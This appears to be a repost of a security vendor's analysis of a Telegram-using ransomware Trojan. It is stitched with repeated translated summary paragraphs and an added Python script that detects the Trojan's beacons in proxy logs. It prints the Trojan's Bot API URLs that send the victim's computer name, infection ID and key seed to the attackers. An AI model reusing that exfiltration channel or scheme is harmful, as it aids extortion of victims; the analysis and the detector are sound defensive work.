1. Researchers discover the first malware to exploit the Telegram protocol
Title: The first cryptor to exploit Telegram
Author information: November 8, 2016, 10:52 am, by Anton Ivanov, Fedor Sinitsyn
//BEGIN
Earlier this month, we discovered a piece of encryption malware targeting Russian users. One of its peculiarities was that it uses Telegram Messenger’s communication protocol to send a decryption key to the threat actor. To our knowledge, this is the first cryptor to use the Telegram protocol in an encryption malware case.
What is a cryptor?
In general, cryptors can be classified into two groups: those which maintain offline encryption and those which don’t.
There are several reasons why file encryption malware requires an Internet connection. For instance, the threat actors may send an encryption key to the cryptor and receive data from it which they can later use to decrypt the victim’s encrypted files.
Obviously, a special service is required on the threat actor’s side to receive data from the cryptor malware. That service must be protected from third-party researchers, and this creates extra software development costs.
Russian instant-messaging users have been given a new first: Telegram Messenger, the chat tool they commonly use, has been turned into a tool and channel for extorting users. This month Kaspersky's security researchers discovered, for the first time, malicious code that uses the communication protocol of the open-source Telegram Messenger to transmit an encryption key.
Cryptors generally fall into two types, online and offline. The malicious code currently in circulation favors the online encryption approach.
//END
Analyzing the Telegram Trojan
The Telegram Trojan is written in Delphi and is over 3MB in size. After launching, it generates a file encryption key and an infection ID (infection_id).
It then contacts the threat actors through the publicly available Telegram Bot API, operating as a Telegram bot to communicate with its creators.
In order for that to happen, the cybercriminals first create a “Telegram bot”. A unique token from the Telegram servers identifies the newly-created bot and is placed into the Trojan’s body so it can use the Telegram API.
The Trojan then sends a request to the URL https://api.telegram.org/bot<token>/GetMe, where <token> is the unique ID of the Telegram bot created by the cybercriminals. According to the official API documentation, the method ‘getMe’ checks whether a bot with the specified token exists and returns basic information about it. The Trojan does not use the information about the bot that the server returns.
The Trojan sends the next request using the method ‘sendMessage’, which allows the bot to send messages to the chat with the specified ID. The Trojan uses the chat ID hardwired into its body and sends an “infection successful” report to its creators:
https://api.telegram.org/bot<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>
The Trojan sends the following parameters in the request:
<chat> – number of the chat with the cybercriminal;
<computer_name> – name of the infected computer;
<infection_id> – infection ID;
<key_seed> – number used as a basis to generate the file encryption key.
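The getMe/sendMessage sequence above is visible to anyone who keeps web-proxy logs, so it is a natural detection point. The following is an added example (not code from the original article or from Kaspersky) that scans constructed proxy log lines for Telegram Bot API calls and raises an alert when a sendMessage text has the <computer_name>_<infection_id>_<key_seed> shape, with higher confidence when the same client called getMe first. The log format, token and chat_id values are invented placeholders; legitimate bots use the same endpoint, so the alert keys on the report shape rather than on the host alone.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample web-proxy log lines (not real traffic): "timestamp client method url status".
# Token and chat_id values are obviously fake; the report text follows the
# <computer_name>_<infection_id>_<key_seed> layout described in the article.
SAMPLE_LOG = """\
2016-11-08T10:51:02Z 10.0.0.15 GET https://api.telegram.org/bot111111:PLACEHOLDER_TOKEN/GetMe 200
2016-11-08T10:51:03Z 10.0.0.15 GET https://api.telegram.org/bot111111:PLACEHOLDER_TOKEN/sendmessage?chat_id=222222&text=WS-ACCT-07_a1b2c3d4_987654321 200
2016-11-08T10:52:10Z 10.0.0.22 GET https://api.telegram.org/bot333333:PLACEHOLDER_TOKEN/sendMessage?chat_id=444444&text=nightly+build+finished 200
2016-11-08T10:53:00Z 10.0.0.31 GET https://example.invalid/index.html 200
"""

# Bot API paths look like /bot<token>/<method>
BOT_PATH_RE = re.compile(r"^/bot([^/]+)/([A-Za-z]+)$")


def parse_bot_api_request(url):
    """Return {token, method, chat_id, text} for a Telegram Bot API URL, else None."""
    u = urlparse(url)
    if u.hostname != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(u.path)
    if not m:
        return None
    q = parse_qs(u.query)
    return {
        "token": m.group(1),
        "method": m.group(2).lower(),  # the API is case-insensitive; the Trojan used GetMe / sendmessage
        "chat_id": q.get("chat_id", [None])[0],
        "text": q.get("text", [None])[0],
    }


def is_infection_report(text):
    """True if text has the shape <computer_name>_<infection_id>_<key_seed> with a numeric seed."""
    if not text:
        return False
    parts = text.rsplit("_", 2)
    return len(parts) == 3 and all(parts) and parts[2].isdigit()


def find_beacons(log_text):
    """Scan log lines; return one alert per sendMessage call whose text looks like an infection report."""
    seen_getme = set()  # clients that already probed their bot token with getMe
    alerts = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        ts, client, _http_method, url = fields[:4]
        req = parse_bot_api_request(url)
        if req is None:
            continue
        if req["method"] == "getme":
            seen_getme.add(client)
        elif req["method"] == "sendmessage" and is_infection_report(req["text"]):
            computer_name, infection_id, key_seed = req["text"].rsplit("_", 2)
            alerts.append({
                "time": ts,
                "client": client,
                "confidence": "high" if client in seen_getme else "medium",
                "bot_token": req["token"],   # IoC worth reporting to Telegram's abuse contact
                "chat_id": req["chat_id"],
                "computer_name": computer_name,
                "infection_id": infection_id,
                "key_seed": key_seed,        # keep: it is the basis of the file encryption key
            })
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(SAMPLE_LOG):
        print(alert)
```

The key_seed captured from the proxy log is worth preserving in the incident record: the article says the file encryption key is generated from it, so the beacon itself may be the recovery path for the victim's files.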
After sending the information, the Trojan searches the hard drives for files with specific extensions, and encrypts them bytewise, using the simple algorithm of adding each file byte to the key bytes.
This ransomware Trojan is written in Delphi and is 3MB in size. Once launched, it generates a unique file-encryption key and an infection ID (a token). The Trojan then contacts its authors through Telegram Messenger's public API, using the infection ID to identify the infected user. The files chosen for encryption are documents likely to be of value to the user, 11 file types: doc, docx, xls, xlsx, jpg, jpeg, png, dt, dbf, cd and pdf. Encryption is done byte by byte, simply adding a secret number to each byte of the original file.
Comment: Although Telegram Messenger is promoted as one of the most secure instant messaging tools, it is precisely its open-source nature that lets ransomware exploit it, by setting up bots, to defraud users.